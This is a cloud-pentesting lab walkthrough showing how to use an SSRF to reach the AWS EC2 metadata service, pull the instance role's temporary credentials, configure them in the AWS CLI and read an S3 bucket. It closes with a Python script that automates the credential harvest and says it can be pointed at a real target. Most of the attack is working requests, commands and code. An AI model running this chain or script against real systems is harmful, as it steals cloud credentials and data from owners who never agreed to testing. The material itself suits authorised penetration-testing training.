Cloud Pentesting: 02_AWS [ SSRF to AWS Metadata to S3 Access ]

 

🎯 Objective

Exploit a Server-Side Request Forgery (SSRF) vulnerability to access AWS EC2 instance metadata, extract temporary credentials, and access an S3 bucket.


Preconditions

  • SSRF vulnerability in web app endpoint (e.g., name=http://...)

  • Target is hosted on an EC2 instance with IMDSv1 reachable (IMDSv2 requires a PUT request to obtain a session token first, which a GET-only SSRF cannot send)

  • Instance has an IAM role attached with S3 access


 Step-by-Step

 1. Confirm SSRF

Inject a URL you control (optional, for validation; example.com below stands in for your own listener):

    GET /status/status.php?name=http://example.com

Check for:

  • A change in response time (the server fetches the URL before it answers)

  • A hit in your listener's log (if you pointed the URL at a host you monitor)

2. Access EC2 Metadata Root

    GET /status/status.php?name=http://169.254.169.254/latest/meta-data/

  Expected output (abbreviated; a 401 or empty response here usually means IMDSv2 is enforced on the instance):
    ami-id
    hostname
    iam/
    instance-id
    ...

3. Find IAM Role Name
    
    GET /status/status.php?name=http://169.254.169.254/latest/meta-data/iam/security-credentials/

    Expected output: 

    LabInstanceRole


4. Extract Temporary Credentials

    
GET /status/status.php?name=http://169.254.169.254/latest/meta-data/iam/security-credentials/LabInstanceRole

    Expected JSON output (Code, LastUpdated and Type fields omitted; a temporary role credential's AccessKeyId starts with ASIA, not the AKIA prefix of a long-term user key):

{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "abc...",
  "Token": "FQoGZXIvYXdzE...",
  "Expiration": "2025-05-23T12:34:56Z"
}

The credentials are only valid until Expiration; if they lapse, repeat this request to get the rotated set.




=================================================


5. Set Up AWS CLI Session

aws configure --profile meta
AWS Access Key ID [None]: <<AccessKeyId from step 4>>
AWS Secret Access Key [None]: <<SecretAccessKey from step 4>>
Default region name [None]: us-west-2
Default output format [None]: json

The role credentials are temporary, so the session token is mandatory; without it every call is rejected as an invalid security token. Paste the complete Token value inside the quotes:

aws configure set aws_session_token "<<Token from step 4>>" --profile meta



6. Access S3 bucket

6.1. Verify which identity the profile resolves to (the AWS equivalent of whoami):

aws sts get-caller-identity --profile meta

Output (redacted):
{
    "UserId": "**************1",
    "Account": "************",
    "Arn": "arn:aws:sts::<<account-id>>:assumed-role/<<role name from step 3>>/<<instance-id>>"
}

The assumed-role ARN should name the role found in step 3 and the target's instance ID; that confirms the calls are going out with the stolen instance credentials.

6.2. Bucket names can be found in the web app's sources: open the homepage and view its source for s3:// or s3.amazonaws.com references.

    aws s3 ls s3://<<bucket-name>>/ --profile meta

   Output
                           PRE backup/
                           PRE web/

6.3. aws s3 cp s3://<<bucket-name>>/flag.txt . --profile meta

Note: you can always navigate the bucket with the command from step 6.2; just append the prefix name or the full path (e.g. s3://<<bucket-name>>/backup/). An AccessDenied here means the role's policy does not allow that bucket or action, and once Expiration from step 4 passes the credentials stop working until you re-fetch them through the SSRF.
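The following script, added here as an example and not part of the original lab notes, automates steps 2 to 4 and prints the non-interactive equivalent of step 5: it requests the IMDSv1 credential paths through the SSRF parameter, strips whatever HTML the vulnerable page wraps around the fetched body, parses the credential JSON, checks that the key is a temporary ASIA key that has not yet expired, and emits the `aws configure set` commands for the `meta` profile. The endpoint path `/status/status.php?name=` is taken from the notes; the host `target.example`, the `fake_fetch` stand-in and the credential values it returns are constructed so the script runs offline. Point `harvest()` at the real endpoint with the default `http_fetch` to use it against a target.

```python
"""SSRF -> IMDSv1 -> instance role credential harvester (steps 2-5 of the notes)."""
import json
import re
import urllib.parse
import urllib.request
from datetime import datetime, timezone

IMDS = "http://169.254.169.254/latest/meta-data/"
CREDS_PATH = IMDS + "iam/security-credentials/"
EXPECTED_FIELDS = ("AccessKeyId", "SecretAccessKey", "Token", "Expiration")


def ssrf_url(base, target):
    """base is the vulnerable endpoint up to and including '?name=';
    target is the URL we want the server to fetch on our behalf."""
    return base + urllib.parse.quote(target, safe="")


def http_fetch(url, timeout=10):
    """Real fetch through the vulnerable app. GET only: IMDSv2 needs a PUT for
    its session token, so this chain only works while IMDSv1 is reachable."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def strip_html(body):
    """The app echoes the fetched body inside its own page; drop the tags."""
    return re.sub(r"<[^>]+>", "", body)


def list_roles(base, fetch=http_fetch):
    """Step 3: one role name per line under iam/security-credentials/."""
    body = strip_html(fetch(ssrf_url(base, CREDS_PATH)))
    return [line.strip() for line in body.splitlines() if line.strip()]


def get_role_credentials(base, role, fetch=http_fetch):
    """Step 4: pull the JSON credential document for one role."""
    body = fetch(ssrf_url(base, CREDS_PATH + role))
    m = re.search(r"\{.*\}", body, re.S)      # outermost JSON object only
    if not m:
        raise ValueError("no JSON object in SSRF response")
    creds = json.loads(m.group(0))
    missing = [f for f in EXPECTED_FIELDS if f not in creds]
    if missing:
        raise ValueError(f"credential JSON missing {missing}")
    return creds


def check_credentials(creds, now=None):
    """Temporary STS keys start with ASIA, and Expiration must be in the future."""
    now = now or datetime.now(timezone.utc)
    exp = datetime.strptime(creds["Expiration"], "%Y-%m-%dT%H:%M:%SZ")
    exp = exp.replace(tzinfo=timezone.utc)
    return {
        "is_temporary": creds["AccessKeyId"].startswith("ASIA"),
        "expired": exp <= now,
        "seconds_left": int((exp - now).total_seconds()),
    }


def aws_cli_commands(creds, profile="meta", region="us-west-2"):
    """Non-interactive form of step 5; the session token is mandatory."""
    return [
        f"aws configure set aws_access_key_id {creds['AccessKeyId']} --profile {profile}",
        f"aws configure set aws_secret_access_key {creds['SecretAccessKey']} --profile {profile}",
        f"aws configure set aws_session_token {creds['Token']} --profile {profile}",
        f"aws configure set region {region} --profile {profile}",
    ]


def harvest(base, fetch=http_fetch):
    """Steps 3 and 4 for every role attached to the instance."""
    roles = list_roles(base, fetch)
    if not roles:
        raise RuntimeError("no IAM role attached, or IMDSv2 enforced / path blocked")
    return {role: get_role_credentials(base, role, fetch) for role in roles}


# --- constructed offline stand-in for the vulnerable app and IMDSv1 ---------
FAKE_BASE = "http://target.example/status/status.php?name="   # assumed host
FAKE_IMDS = {                                                   # constructed data
    CREDS_PATH: "LabInstanceRole\n",
    CREDS_PATH + "LabInstanceRole": json.dumps({
        "Code": "Success", "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLE000000001",
        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
        "Token": "FQoGZXIvYXdzE...",
        "Expiration": "2025-05-23T12:34:56Z",
    }),
}


def fake_fetch(url):
    """Simulates status.php fetching the ?name= URL and echoing it inside <pre>."""
    target = urllib.parse.unquote(url[len(FAKE_BASE):])
    return "<pre>" + FAKE_IMDS[target] + "</pre>"


if __name__ == "__main__":
    for role, creds in harvest(FAKE_BASE, fake_fetch).items():
        print(role, check_credentials(creds))
        print("\n".join(aws_cli_commands(creds)))
```

The target URL is percent-encoded into the query string rather than pasted raw as in the manual requests above; both forms reach IMDS, but encoding keeps the slashes and colons from being mangled by the app's own parsing. `check_credentials` is there because the two most common dead ends at step 5 are a long-term AKIA key that is not an instance credential at all and a token that expired while you were setting up the profile.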